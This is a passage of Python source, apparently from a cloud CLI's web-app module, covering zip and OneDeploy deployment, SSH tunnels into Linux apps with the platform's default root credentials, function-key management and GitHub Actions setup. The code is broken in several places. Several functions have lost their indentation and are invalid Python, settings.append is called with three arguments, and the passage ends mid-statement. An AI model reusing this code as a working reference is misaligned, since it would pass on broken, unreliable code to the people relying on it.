        _configure_default_logging(cmd, rg_name, name)
    else:  # for existing app if we might need to update the stack runtime settings
        helper = _StackRuntimeHelper(cmd, linux=_is_linux, windows=not _is_linux)
        match = helper.resolve(runtime_version, _is_linux)
        if os_name.lower() == 'linux' and site_config.linux_fx_version != runtime_version:
            if match and site_config.linux_fx_version != match.configs['linux_fx_version']:
                logger.warning('Updating runtime version from %s to %s',
                               site_config.linux_fx_version, match.configs['linux_fx_version'])
                update_site_configs(cmd, rg_name, name, linux_fx_version=match.configs['linux_fx_version'])
                logger.warning('Waiting for runtime version to propagate ...')
                time.sleep(30)  # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
            elif not match:
                logger.warning('Updating runtime version from %s to %s',
                               site_config.linux_fx_version, runtime_version)
                update_site_configs(cmd, rg_name, name, linux_fx_version=runtime_version)
                logger.warning('Waiting for runtime version to propagate ...')
                time.sleep(30)  # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
        elif os_name.lower() == 'windows':
            # may need to update stack runtime settings. For node its site_config.app_settings, otherwise site_config
            if match:
                _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version)
        create_json['runtime_version'] = runtime_version
    # Zip contents & Deploy
    logger.warning("Creating zip with contents of dir %s ...", src_dir)
    # zip contents & deploy
    zip_file_path = zip_contents_from_dir(src_dir, language)
    enable_zip_deploy(cmd, rg_name, name, zip_file_path)
    if launch_browser:
        logger.warning("Launching app using default browser")
        view_in_browser(cmd, rg_name, name, None, logs)
    else:
        _url = _get_url(cmd, rg_name, name)
        logger.warning("You can launch the app at %s", _url)
        create_json.update({'URL': _url})
    if logs:
        _configure_default_logging(cmd, rg_name, name)
        return get_streaming_log(cmd, rg_name, name)
    _set_webapp_up_default_args(cmd, rg_name, sku, plan, loc, name)
    return create_json
def _set_webapp_up_default_args(cmd, rg_name, sku, plan, loc, name):
    """Persist the values chosen by 'az webapp up' as local (per-directory) configured defaults."""
    with ConfiguredDefaultSetter(cmd.cli_ctx.config, True):
        logger.warning("Setting 'az webapp up' default arguments for current directory. "
                       "Manage defaults with 'az configure --scope local'")
        # (config key, value, warning format) triples — one per persisted default.
        for key, value, message in (
                ('group', rg_name, "--resource-group/-g default: %s"),
                ('sku', sku, "--sku default: %s"),
                ('appserviceplan', plan, "--plan/-p default: %s"),
                ('location', loc, "--location/-l default: %s"),
                ('web', name, "--name/-n default: %s")):
            cmd.cli_ctx.config.set_value('defaults', key, value)
            logger.warning(message, value)
def _update_app_settings_for_windows_if_needed(cmd, rg_name, name, match, site_config, runtime_version):
update_needed = False
if 'node' in runtime_version:
settings = []
for k, v in match.configs.items():
for app_setting in site_config.app_settings:
if app_setting.name == k and app_setting.value != v:
update_needed = True
settings.append('%s=%s', k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_app_settings(cmd, rg_name, name, settings=settings, slot=None, slot_settings=None)
else:
for k, v in match.configs.items():
if getattr(site_config, k, None) != v:
update_needed = True
setattr(site_config, k, v)
if update_needed:
logger.warning('Updating runtime version to %s', runtime_version)
update_site_configs(cmd,
rg_name,
name,
net_framework_version=site_config.net_framework_version,
php_version=site_config.php_version,
python_version=site_config.python_version,
java_version=site_config.java_version,
java_container=site_config.java_container,
java_container_version=site_config.java_container_version)
current_stack = get_current_stack_from_runtime(runtime_version)
_update_webapp_current_stack_property_if_needed(cmd, rg_name, name, current_stack)
if update_needed:
logger.warning('Waiting for runtime version to propagate ...')
time.sleep(30) # wait for kudu to get updated runtime before zipdeploy. No way to poll for this
def _update_webapp_current_stack_property_if_needed(cmd, resource_group, name, current_stack):
if not current_stack:
return
# portal uses this current_stack value to display correct runtime for windows webapps
client = web_client_factory(cmd.cli_ctx)
app_metadata = client.web_apps.list_metadata(resource_group, name)
if 'CURRENT_STACK' not in app_metadata.properties or app_metadata.properties["CURRENT_STACK"] != current_stack:
app_metadata.properties["CURRENT_STACK"] = current_stack
client.web_apps.update_metadata(resource_group, name, metadata=app_metadata)
def _ping_scm_site(cmd, resource_group, name, instance=None):
    """Wake up the Kudu (SCM) site with an authenticated GET, optionally pinned to one instance."""
    import urllib3
    import requests
    from azure.cli.core.util import should_disable_connection_verify
    # work around until the timeout limits issue for linux is investigated & fixed
    user_name, password = _get_site_credential(cmd.cli_ctx, resource_group, name)
    scm_url = _get_scm_url(cmd, resource_group, name)
    auth_headers = urllib3.util.make_headers(basic_auth='{}:{}'.format(user_name, password))
    # The ARRAffinity cookie routes the request to a specific scaled-out instance.
    cookies = {} if instance is None else {'ARRAffinity': instance}
    requests.get(scm_url + '/api/settings', headers=auth_headers,
                 verify=not should_disable_connection_verify(), cookies=cookies)
def is_webapp_up(tunnel_server):
    """Delegate to the tunnel server's own webapp liveness probe."""
    status = tunnel_server.is_webapp_up()
    return status
def get_tunnel(cmd, resource_group_name, name, port=None, slot=None, instance=None):
    """Build a TunnelServer for a Linux webapp and wait until the app answers its probe."""
    webapp = show_webapp(cmd, resource_group_name, name, slot)
    if not webapp.reserved:
        raise CLIError("Only Linux App Service Plans supported, Found a Windows App Service Plan")
    profiles = list_publish_profiles(cmd, resource_group_name, name, slot)
    profile_user_name = next(p['userName'] for p in profiles)
    profile_user_password = next(p['userPWD'] for p in profiles)
    if port is None:
        port = 0  # Will auto-select a free port from 1024-65535
        logger.info('No port defined, creating on random free port')
    # Validate that we have a known instance (case-sensitive)
    if instance is not None:
        known_instances = {i.name for i in list_instances(cmd, resource_group_name, name, slot=slot)}
        if instance not in known_instances:
            if slot is not None:
                raise CLIError("The provided instance '{}' is not valid for this webapp and slot.".format(instance))
            raise CLIError("The provided instance '{}' is not valid for this webapp.".format(instance))
    scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
    tunnel_server = TunnelServer('', port, scm_url, profile_user_name, profile_user_password, instance)
    _ping_scm_site(cmd, resource_group_name, name, instance=instance)
    _wait_for_webapp(tunnel_server)
    return tunnel_server
def create_tunnel(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
    """Open a local tunnel to the webapp's SSH endpoint and keep it alive until timeout/exit."""
    tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
    tunnel_thread = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
    tunnel_thread.daemon = True
    tunnel_thread.start()
    logger.warning('Opening tunnel on port: %s', tunnel_server.local_port)
    config = get_site_configs(cmd, resource_group_name, name, slot)
    if config.remote_debugging_enabled:
        logger.warning('Tunnel is ready, connect on port %s', tunnel_server.local_port)
    else:
        # Default credentials of the platform SSH endpoint inside the container.
        logger.warning('SSH is available { username: %s, password: %s }', 'root', 'Docker!')
    logger.warning('Ctrl + C to close')
    if timeout:
        time.sleep(int(timeout))
    else:
        while tunnel_thread.is_alive():
            time.sleep(5)
def create_tunnel_and_session(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):
    """Open a local tunnel and attach an interactive SSH session over it; block until done."""
    tunnel_server = get_tunnel(cmd, resource_group_name, name, port, slot, instance)
    tunnel_thread = threading.Thread(target=_start_tunnel, args=(tunnel_server,))
    tunnel_thread.daemon = True
    tunnel_thread.start()
    # Default credentials of the platform SSH endpoint inside the container.
    ssh_thread = threading.Thread(target=_start_ssh_session,
                                  args=('localhost', tunnel_server.get_port(), 'root', 'Docker!'))
    ssh_thread.daemon = True
    ssh_thread.start()
    if timeout:
        time.sleep(int(timeout))
    else:
        while ssh_thread.is_alive() and tunnel_thread.is_alive():
            time.sleep(5)
def perform_onedeploy(cmd,
                      resource_group_name,
                      name,
                      src_path=None,
                      src_url=None,
                      target_path=None,
                      artifact_type=None,
                      is_async=None,
                      restart=None,
                      clean=None,
                      ignore_stack=None,
                      timeout=None,
                      slot=None):
    """Deploy an artifact via the OneDeploy API, translating CLI args into OneDeployParams."""
    params = OneDeployParams()
    # Map each CLI argument onto its OneDeployParams field.
    field_values = {
        'cmd': cmd,
        'resource_group_name': resource_group_name,
        'webapp_name': name,
        'src_path': src_path,
        'src_url': src_url,
        'target_path': target_path,
        'artifact_type': artifact_type,
        'is_async_deployment': is_async,
        'should_restart': restart,
        'is_clean_deployment': clean,
        'should_ignore_stack': ignore_stack,
        'timeout': timeout,
        'slot': slot,
    }
    for attr, value in field_values.items():
        setattr(params, attr, value)
    return _perform_onedeploy_internal(params)
# Simple value object carrying every knob accepted by the OneDeploy API call.
# pylint: disable=too-many-instance-attributes,too-few-public-methods
class OneDeployParams:
    """Bag of parameters describing a single OneDeploy deployment request."""
    def __init__(self):
        # Every field starts as None; callers fill in only what they need.
        for attr in ('cmd', 'resource_group_name', 'webapp_name', 'src_path', 'src_url',
                     'artifact_type', 'is_async_deployment', 'target_path', 'should_restart',
                     'is_clean_deployment', 'should_ignore_stack', 'timeout', 'slot'):
            setattr(self, attr, None)
# pylint: enable=too-many-instance-attributes,too-few-public-methods
def _build_onedeploy_url(params):
    """Compose the Kudu OneDeploy publish URL, appending each optional query flag that is set."""
    scm_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
    query = 'type=' + params.artifact_type
    if params.is_async_deployment is not None:
        query += '&async=' + str(params.is_async_deployment)
    if params.should_restart is not None:
        query += '&restart=' + str(params.should_restart)
    if params.is_clean_deployment is not None:
        query += '&clean=' + str(params.is_clean_deployment)
    if params.should_ignore_stack is not None:
        query += '&ignorestack=' + str(params.should_ignore_stack)
    if params.target_path is not None:
        query += '&path=' + params.target_path
    return scm_url + '/api/publish?' + query
def _get_onedeploy_status_url(params):
    """Return the Kudu endpoint that reports the latest deployment's status."""
    base_url = _get_scm_url(params.cmd, params.resource_group_name, params.webapp_name, params.slot)
    return '{}/api/deployments/latest'.format(base_url)
def _get_basic_headers(params):
    """Build the HTTP headers (basic auth, cache control, content type) for a OneDeploy request."""
    import urllib3
    user_name, password = _get_site_credential(params.cmd.cli_ctx, params.resource_group_name,
                                               params.webapp_name, params.slot)
    # Local file uploads are raw bytes; URL-based deployments send a JSON descriptor.
    if params.src_path:
        content_type = 'application/octet-stream'
    elif params.src_url:
        content_type = 'application/json'
    else:
        raise CLIError('Unable to determine source location of the artifact being deployed')
    headers = urllib3.util.make_headers(basic_auth='{0}:{1}'.format(user_name, password))
    headers.update({
        'Cache-Control': 'no-cache',
        'User-Agent': get_az_user_agent(),
        'Content-Type': content_type,
    })
    return headers
def _get_onedeploy_request_body(params):
    """Return the request payload: raw file bytes for a local source, a JSON descriptor for a URL source."""
    import os
    if params.src_path:
        logger.info('Deploying from local path: %s', params.src_path)
        artifact_path = os.path.realpath(os.path.expanduser(params.src_path))
        try:
            with open(artifact_path, 'rb') as artifact_file:
                return artifact_file.read()
        except Exception as e:  # pylint: disable=broad-except
            raise CLIError("Either '{}' is not a valid local file path or you do not have permissions to access it"
                           .format(params.src_path)) from e
    if params.src_url:
        logger.info('Deploying from URL: %s', params.src_url)
        return json.dumps({"packageUri": params.src_url})
    raise CLIError('Unable to determine source location of the artifact being deployed')
def _update_artifact_type(params):
import ntpath
if params.artifact_type is not None:
return
# Interpret deployment type from the file extension if the type parameter is not passed
file_name = ntpath.basename(params.src_path)
file_extension = file_name.split(".", 1)[1]
if file_extension in ('war', 'jar', 'ear', 'zip'):
params.artifact_type = file_extension
elif file_extension in ('sh', 'bat'):
params.artifact_type = 'startup'
else:
params.artifact_type = 'static'
logger.warning("Deployment type: %s. To override deployment type, please specify the --type parameter. "
"Possible values: war, jar, ear, zip, startup, script, static", params.artifact_type)
def _make_onedeploy_request(params):
    """POST the artifact to the OneDeploy API and poll until the deployment finishes.

    Returns the final deployment status body on success. Raises CLIError on
    failure: 404 means the API is unavailable in this environment, 409 means
    another deployment is already in progress, anything else is surfaced with
    the response details.
    """
    import requests
    from azure.cli.core.util import (
        should_disable_connection_verify,
    )
    # Build the request body, headers, API URL and status URL
    body = _get_onedeploy_request_body(params)
    headers = _get_basic_headers(params)
    deploy_url = _build_onedeploy_url(params)
    deployment_status_url = _get_onedeploy_status_url(params)
    logger.info("Deployment API: %s", deploy_url)
    response = requests.post(deploy_url, data=body, headers=headers, verify=not should_disable_connection_verify())
    # For debugging purposes only, you can change the async deployment into a sync deployment by polling the API status
    # For that, set poll_async_deployment_for_debugging=True
    poll_async_deployment_for_debugging = True
    # check the status of async deployment
    if response.status_code in (200, 202):
        response_body = None
        if poll_async_deployment_for_debugging:
            logger.info('Polling the status of async deployment')
            response_body = _check_zip_deployment_status(params.cmd, params.resource_group_name, params.webapp_name,
                                                         deployment_status_url, headers, params.timeout)
            logger.info('Async deployment complete. Server response: %s', response_body)
        return response_body
    # API not available yet!
    if response.status_code == 404:
        raise CLIError("This API isn't available in this environment yet!")
    # check if there's an ongoing process
    if response.status_code == 409:
        raise CLIError("Another deployment is in progress. Please wait until that process is complete before "
                       "starting a new deployment. You can track the ongoing deployment at {}"
                       .format(deployment_status_url))
    # Any other status is treated as a deployment failure
    # (typo fix in the user-facing message: 'occured' -> 'occurred').
    if response.status_code:
        raise CLIError("An error occurred during deployment. Status Code: {}, Details: {}"
                       .format(response.status_code, response.text))
# OneDeploy
def _perform_onedeploy_internal(params):
    """Drive a OneDeploy deployment: resolve the artifact type, then invoke the API."""
    # Update artifact type, if required
    _update_artifact_type(params)
    logger.info("Initiating deployment")
    deployment_response = _make_onedeploy_request(params)
    logger.info("Deployment has completed successfully")
    return deployment_response
def _wait_for_webapp(tunnel_server):
    """Block until the webapp answers the tunnel's liveness probe.

    Warns once up front, prints a dot per one-second retry, and gives up after
    60 attempts with an SSH-timeout error.
    """
    attempt = 0
    while not is_webapp_up(tunnel_server):
        if attempt == 0:
            logger.warning('Connection is not ready yet, please wait')
        if attempt == 60:
            raise CLIError('SSH timeout, your app must be running before'
                           ' it can accept SSH connections. '
                           'Use `az webapp log tail` to review the app startup logs.')
        attempt += 1
        logger.warning('.')
        time.sleep(1)
def _start_tunnel(tunnel_server):
tunnel_server.start_server()
def _start_ssh_session(hostname, port, username, password):
    """Open an interactive SSH session over the local tunnel.

    Retries the connection once per second for up to a minute, then prints the
    remote MOTD (if any) and launches a login shell, blocking until it exits.
    """
    attempts = 0
    while True:
        try:
            connection = Connection(host=hostname,
                                    port=port,
                                    user=username,
                                    # connect_timeout=60*10,
                                    connect_kwargs={"password": password})
            break
        except Exception as ex:  # pylint: disable=broad-except
            logger.info(ex)
            if attempts == 0:
                logger.warning('Connection is not ready yet, please wait')
            if attempts == 60:
                raise CLIError("Timeout Error, Unable to establish a connection")
            attempts += 1
            logger.warning('.')
            time.sleep(1)
    try:
        try:
            connection.run('cat /etc/motd', pty=True)
        except invoke.exceptions.UnexpectedExit:
            # Don't crash over a non-existing /etc/motd.
            pass
        connection.run('source /etc/profile; exec $SHELL -l', pty=True)
    except Exception as ex:  # pylint: disable=broad-except
        logger.info(ex)
    finally:
        connection.close()
def ssh_webapp(cmd, resource_group_name, name, port=None, slot=None, timeout=None, instance=None):  # pylint: disable=too-many-statements
    """SSH into a Linux webapp: via Kudu's browser-based web SSH on Windows clients, otherwise via a local tunnel."""
    import platform
    if platform.system() == "Windows":
        # A local PTY session isn't available on Windows clients; use the web SSH page instead.
        webapp = show_webapp(cmd, resource_group_name, name, slot)
        if not webapp.reserved:
            raise ValidationError("Only Linux App Service Plans supported, found a Windows App Service Plan")
        scm_url = _get_scm_url(cmd, resource_group_name, name, slot)
        if not instance:
            page = scm_url + '/webssh/host'
        else:
            page = scm_url + '/webssh/host?instance={}'.format(instance)
        open_page_in_browser(page)
    else:
        config = get_site_configs(cmd, resource_group_name, name, slot)
        if config.remote_debugging_enabled:
            raise ValidationError('Remote debugging is enabled, please disable')
        create_tunnel_and_session(
            cmd, resource_group_name, name, port=port, slot=slot, timeout=timeout, instance=instance)
def _configure_default_logging(cmd, rg_name, name):
    """Enable filesystem application, web-server and container logging for the app."""
    logger.warning("Configuring default logging for the app, if not already enabled")
    diagnostics_settings = {
        'application_logging': True,
        'web_server_logging': 'filesystem',
        'docker_container_logging': 'true',
    }
    return config_diagnostics(cmd, rg_name, name, **diagnostics_settings)
def _validate_app_service_environment_id(cli_ctx, ase, resource_group_name):
    """Return a full ASE resource ID, expanding a bare name with the current subscription and RG."""
    if is_valid_resource_id(ase):
        return ase
    from azure.cli.core.commands.client_factory import get_subscription_id
    return resource_id(
        subscription=get_subscription_id(cli_ctx),
        resource_group=resource_group_name,
        namespace='Microsoft.Web',
        type='hostingEnvironments',
        name=ase)
def _format_key_vault_id(cli_ctx, key_vault, resource_group_name):
    """Return a full Key Vault resource ID, expanding a bare vault name with subscription and RG."""
    if is_valid_resource_id(key_vault):
        return key_vault
    from azure.cli.core.commands.client_factory import get_subscription_id
    return resource_id(
        subscription=get_subscription_id(cli_ctx),
        resource_group=resource_group_name,
        namespace='Microsoft.KeyVault',
        type='vaults',
        name=key_vault)
def _verify_hostname_binding(cmd, resource_group_name, name, hostname, slot=None):
    """Return True if *hostname* is bound to the app with a 'Verified' or 'Managed' binding.

    The comparison is case-insensitive on both sides (DNS names are case-insensitive);
    the previous implementation compared the lowered binding name against the raw
    input, so a mixed-case hostname could never match. Exits on first match.
    """
    hostname_bindings = _generic_site_operation(cmd.cli_ctx, resource_group_name, name,
                                                'list_host_name_bindings', slot)
    wanted = hostname.lower()
    for hostname_binding in hostname_bindings:
        # Binding names come back as 'site/hostname'; keep only the hostname part.
        binding_name = hostname_binding.name.split('/')[-1]
        if binding_name.lower() == wanted and hostname_binding.host_name_type in ('Verified', 'Managed'):
            return True
    return False
def update_host_key(cmd, resource_group_name, name, key_type, key_name, key_value=None, slot=None):
    """Create or update a host-level key on a function app (slot-aware)."""
    # pylint: disable=protected-access
    key_info = KeyInfo(name=key_name, value=key_value)
    # The service expects name/value nested under 'properties' in the serialized payload.
    KeyInfo._attribute_map = {
        'name': {'key': 'properties.name', 'type': 'str'},
        'value': {'key': 'properties.value', 'type': 'str'},
    }
    client = web_client_factory(cmd.cli_ctx)
    if not slot:
        return client.web_apps.create_or_update_host_secret(resource_group_name, name, key_type,
                                                            key_name, key=key_info)
    return client.web_apps.create_or_update_host_secret_slot(resource_group_name, name, key_type,
                                                             key_name, slot, key=key_info)
def list_host_keys(cmd, resource_group_name, name, slot=None):
    """List the host-level keys of a function app (slot-aware)."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return web_apps.list_host_keys_slot(resource_group_name, name, slot)
    return web_apps.list_host_keys(resource_group_name, name)
def delete_host_key(cmd, resource_group_name, name, key_type, key_name, slot=None):
    """Delete a host-level key from a function app (slot-aware)."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return web_apps.delete_host_secret_slot(resource_group_name, name, key_type, key_name, slot)
    return web_apps.delete_host_secret(resource_group_name, name, key_type, key_name)
def show_function(cmd, resource_group_name, name, function_name):
    """Get a single function of a function app; returns a message string if it doesn't exist."""
    client = web_client_factory(cmd.cli_ctx)
    function = client.web_apps.get_function(resource_group_name, name, function_name)
    if function is not None:
        return function
    return "Function '{}' does not exist in app '{}'".format(function_name, name)
def delete_function(cmd, resource_group_name, name, function_name):
    """Delete a single function from a function app."""
    client = web_client_factory(cmd.cli_ctx)
    return client.web_apps.delete_function(resource_group_name, name, function_name)
def update_function_key(cmd, resource_group_name, name, function_name, key_name, key_value=None, slot=None):
    """Create or update a key on a specific function (slot-aware)."""
    # pylint: disable=protected-access
    key_info = KeyInfo(name=key_name, value=key_value)
    # The service expects name/value nested under 'properties' in the serialized payload.
    KeyInfo._attribute_map = {
        'name': {'key': 'properties.name', 'type': 'str'},
        'value': {'key': 'properties.value', 'type': 'str'},
    }
    client = web_client_factory(cmd.cli_ctx)
    if not slot:
        return client.web_apps.create_or_update_function_secret(resource_group_name, name, function_name,
                                                                key_name, key_info)
    return client.web_apps.create_or_update_function_secret_slot(resource_group_name, name, function_name,
                                                                 key_name, slot, key_info)
def list_function_keys(cmd, resource_group_name, name, function_name, slot=None):
    """List all keys defined on a specific function (slot-aware)."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return web_apps.list_function_keys_slot(resource_group_name, name, function_name, slot)
    return web_apps.list_function_keys(resource_group_name, name, function_name)
def delete_function_key(cmd, resource_group_name, name, key_name, function_name=None, slot=None):
    """Delete a key from a specific function (slot-aware)."""
    web_apps = web_client_factory(cmd.cli_ctx).web_apps
    if slot:
        return web_apps.delete_function_secret_slot(resource_group_name, name, function_name, key_name, slot)
    return web_apps.delete_function_secret(resource_group_name, name, function_name, key_name)
def add_github_actions(cmd, resource_group, name, repo, runtime=None, token=None, slot=None,  # pylint: disable=too-many-statements,too-many-branches
                       branch='master', login_with_github=False, force=False):
    """Configure GitHub Actions deployment for a webapp.

    Verifies the app and the GitHub repo/branch, detects (or accepts) the
    runtime, commits a workflow file to the repo, stores the app's publish
    profile as a repo secret, and points the app's source-control config at
    the repo.  Returns the repo's GitHub Actions URL.
    """
    if not token and not login_with_github:
        raise_missing_token_suggestion()
    elif not token:
        scopes = ["admin:repo_hook", "repo", "workflow"]
        token = get_github_access_token(cmd, scopes)
    elif token and login_with_github:
        logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
    # Verify resource group, app
    site_availability = get_site_availability(cmd, name)
    # "name available" (or invalid-name) means no such site exists in this subscription.
    if site_availability.name_available or (not site_availability.name_available and
                                            site_availability.reason == 'Invalid'):
        raise ResourceNotFoundError(
            "The Resource 'Microsoft.Web/sites/%s' under resource group '%s' "
            "was not found." % (name, resource_group))
    app_details = get_app_details(cmd, name)
    if app_details is None:
        raise ResourceNotFoundError(
            "Unable to retrieve details of the existing app %s. Please check that the app is a part of "
            "the current subscription" % name)
    current_rg = app_details.resource_group
    if resource_group is not None and (resource_group.lower() != current_rg.lower()):
        raise ResourceNotFoundError("The webapp %s exists in ResourceGroup %s and does not match the "
                                    "value entered %s. Please re-run command with the correct "
                                    "parameters." % (name, current_rg, resource_group))
    parsed_plan_id = parse_resource_id(app_details.server_farm_id)
    client = web_client_factory(cmd.cli_ctx)
    plan_info = client.app_service_plans.get(parsed_plan_id['resource_group'], parsed_plan_id['name'])
    is_linux = plan_info.reserved
    # Verify github repo
    from github import Github, GithubException
    from github.GithubException import BadCredentialsException, UnknownObjectException
    if repo.strip()[-1] == '/':
        repo = repo.strip()[:-1]
    g = Github(token)
    github_repo = None
    try:
        github_repo = g.get_repo(repo)
        try:
            github_repo.get_branch(branch=branch)
        except GithubException as e:
            error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
            if e.data and e.data['message']:
                error_msg += " Error: {}".format(e.data['message'])
            raise CLIError(error_msg)
        logger.warning('Verified GitHub repo and branch')
    except BadCredentialsException:
        raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
                       "the --token argument. Run 'az webapp deployment github-actions add --help' "
                       "for more information.")
    except GithubException as e:
        error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
        if e.data and e.data['message']:
            error_msg += " Error: {}".format(e.data['message'])
        raise CLIError(error_msg)
    # Verify runtime
    app_runtime_info = _get_app_runtime_info(
        cmd=cmd, resource_group=resource_group, name=name, slot=slot, is_linux=is_linux)
    app_runtime_string = None
    if app_runtime_info and app_runtime_info['display_name']:
        app_runtime_string = app_runtime_info['display_name']
    github_actions_version = None
    if app_runtime_info and app_runtime_info['github_actions_version']:
        github_actions_version = app_runtime_info['github_actions_version']
    if runtime and app_runtime_string:
        if app_runtime_string.lower() != runtime.lower():
            # BUG FIX: the original passed a plain (non-f) string, so the literal
            # text '{app_runtime_string}' was logged; use lazy %-style args.
            logger.warning('The app runtime: %s does not match the runtime specified: '
                           '%s. Using the specified runtime %s.', app_runtime_string, runtime, runtime)
            app_runtime_string = runtime
    elif runtime:
        app_runtime_string = runtime
    if not app_runtime_string:
        raise CLIError('Could not detect runtime. Please specify using the --runtime flag.')
    if not _runtime_supports_github_actions(cmd=cmd, runtime_string=app_runtime_string, is_linux=is_linux):
        raise CLIError("Runtime %s is not supported for GitHub Actions deployments." % app_runtime_string)
    # Get workflow template
    logger.warning('Getting workflow template using runtime: %s', app_runtime_string)
    workflow_template = _get_workflow_template(github=g, runtime_string=app_runtime_string, is_linux=is_linux)
    # Fill workflow template
    guid = str(uuid.uuid4()).replace('-', '')
    publish_profile_name = "AzureAppService_PublishProfile_{}".format(guid)
    logger.warning(
        'Filling workflow template with name: %s, branch: %s, version: %s, slot: %s',
        name, branch, github_actions_version, slot if slot else 'production')
    completed_workflow_file = _fill_workflow_template(content=workflow_template.decoded_content.decode(), name=name,
                                                      branch=branch, slot=slot, publish_profile=publish_profile_name,
                                                      version=github_actions_version)
    completed_workflow_file = completed_workflow_file.encode()
    # Check if workflow exists in repo, otherwise push
    if slot:
        file_name = "{}_{}({}).yml".format(branch.replace('/', '-'), name.lower(), slot)
    else:
        file_name = "{}_{}.yml".format(branch.replace('/', '-'), name.lower())
    dir_path = "{}/{}".format('.github', 'workflows')
    file_path = "{}/{}".format(dir_path, file_name)
    try:
        existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
        existing_publish_profile_name = _get_publish_profile_from_workflow_file(
            workflow_file=str(existing_workflow_file.decoded_content))
        if existing_publish_profile_name:
            # Reuse the secret name already referenced by the committed workflow
            # so we do not orphan the old secret.
            completed_workflow_file = completed_workflow_file.decode()
            completed_workflow_file = completed_workflow_file.replace(
                publish_profile_name, existing_publish_profile_name)
            completed_workflow_file = completed_workflow_file.encode()
            publish_profile_name = existing_publish_profile_name
        logger.warning("Existing workflow file found")
        if force:
            logger.warning("Replacing the existing workflow file")
            github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
                                    content=completed_workflow_file, sha=existing_workflow_file.sha, branch=branch)
        else:
            option = prompt_y_n('Replace existing workflow file?')
            if option:
                logger.warning("Replacing the existing workflow file")
                github_repo.update_file(path=file_path, message="Update workflow using Azure CLI",
                                        content=completed_workflow_file, sha=existing_workflow_file.sha,
                                        branch=branch)
            else:
                logger.warning("Use the existing workflow file")
                if existing_publish_profile_name:
                    publish_profile_name = existing_publish_profile_name
    except UnknownObjectException:
        logger.warning("Creating new workflow file: %s", file_path)
        github_repo.create_file(path=file_path, message="Create workflow using Azure CLI",
                                content=completed_workflow_file, branch=branch)
    # Add publish profile to GitHub
    logger.warning('Adding publish profile to GitHub')
    _add_publish_profile_to_github(cmd=cmd, resource_group=resource_group, name=name, repo=repo,
                                   token=token, github_actions_secret_name=publish_profile_name,
                                   slot=slot)
    # Set site source control properties
    _update_site_source_control_properties_for_gh_action(
        cmd=cmd, resource_group=resource_group, name=name, token=token, repo=repo, branch=branch, slot=slot)
    github_actions_url = "https://github.com/{}/actions".format(repo)
    return github_actions_url
def remove_github_actions(cmd, resource_group, name, repo, token=None, slot=None,  # pylint: disable=too-many-statements
                          branch='master', login_with_github=False):
    """Disconnect GitHub Actions deployment from a webapp.

    Deletes the committed workflow file from the repo, removes the
    publish-profile secret it referenced, and clears the app's source-control
    binding.  Returns a status string on success; raises CLIError on failure.
    """
    if not token and not login_with_github:
        raise_missing_token_suggestion()
    elif not token:
        scopes = ["admin:repo_hook", "repo", "workflow"]
        token = get_github_access_token(cmd, scopes)
    elif token and login_with_github:
        logger.warning("Both token and --login-with-github flag are provided. Will use provided token")
    # Verify resource group, app
    site_availability = get_site_availability(cmd, name)
    # "name available" (or invalid-name) means no such site exists in this subscription.
    if site_availability.name_available or (not site_availability.name_available and
                                            site_availability.reason == 'Invalid'):
        raise CLIError("The Resource 'Microsoft.Web/sites/%s' under resource group '%s' was not found." %
                       (name, resource_group))
    app_details = get_app_details(cmd, name)
    if app_details is None:
        raise CLIError("Unable to retrieve details of the existing app %s. "
                       "Please check that the app is a part of the current subscription" % name)
    current_rg = app_details.resource_group
    if resource_group is not None and (resource_group.lower() != current_rg.lower()):
        raise CLIError("The webapp %s exists in ResourceGroup %s and does not match "
                       "the value entered %s. Please re-run command with the correct "
                       "parameters." % (name, current_rg, resource_group))
    # Verify github repo
    from github import Github, GithubException
    from github.GithubException import BadCredentialsException, UnknownObjectException
    if repo.strip()[-1] == '/':
        repo = repo.strip()[:-1]
    g = Github(token)
    github_repo = None
    try:
        github_repo = g.get_repo(repo)
        try:
            github_repo.get_branch(branch=branch)
        except GithubException as e:
            error_msg = "Encountered GitHub error when accessing {} branch in {} repo.".format(branch, repo)
            if e.data and e.data['message']:
                error_msg += " Error: {}".format(e.data['message'])
            raise CLIError(error_msg)
        logger.warning('Verified GitHub repo and branch')
    except BadCredentialsException:
        raise CLIError("Could not authenticate to the repository. Please create a Personal Access Token and use "
                       "the --token argument. Run 'az webapp deployment github-actions add --help' "
                       "for more information.")
    except GithubException as e:
        error_msg = "Encountered GitHub error when accessing {} repo".format(repo)
        if e.data and e.data['message']:
            error_msg += " Error: {}".format(e.data['message'])
        raise CLIError(error_msg)
    # Check if workflow exists in repo and remove
    # File name matches the one written by add_github_actions (slot suffix in parens).
    file_name = "{}_{}({}).yml".format(
        branch.replace('/', '-'), name.lower(), slot) if slot else "{}_{}.yml".format(
        branch.replace('/', '-'), name.lower())
    dir_path = "{}/{}".format('.github', 'workflows')
    # NOTE(review): the leading '/' differs from add_github_actions, which builds
    # the path without it — confirm both path forms resolve via the GitHub API.
    file_path = "/{}/{}".format(dir_path, file_name)
    existing_publish_profile_name = None
    try:
        existing_workflow_file = github_repo.get_contents(path=file_path, ref=branch)
        # Remember the secret name referenced by the workflow so it can be removed below.
        existing_publish_profile_name = _get_publish_profile_from_workflow_file(
            workflow_file=str(existing_workflow_file.decoded_content))
        logger.warning("Removing the existing workflow file")
        github_repo.delete_file(path=file_path, message="Removing workflow file, disconnecting github actions",
                                sha=existing_workflow_file.sha, branch=branch)
    except UnknownObjectException as e:
        error_msg = "Error when removing workflow file."
        if e.data and e.data['message']:
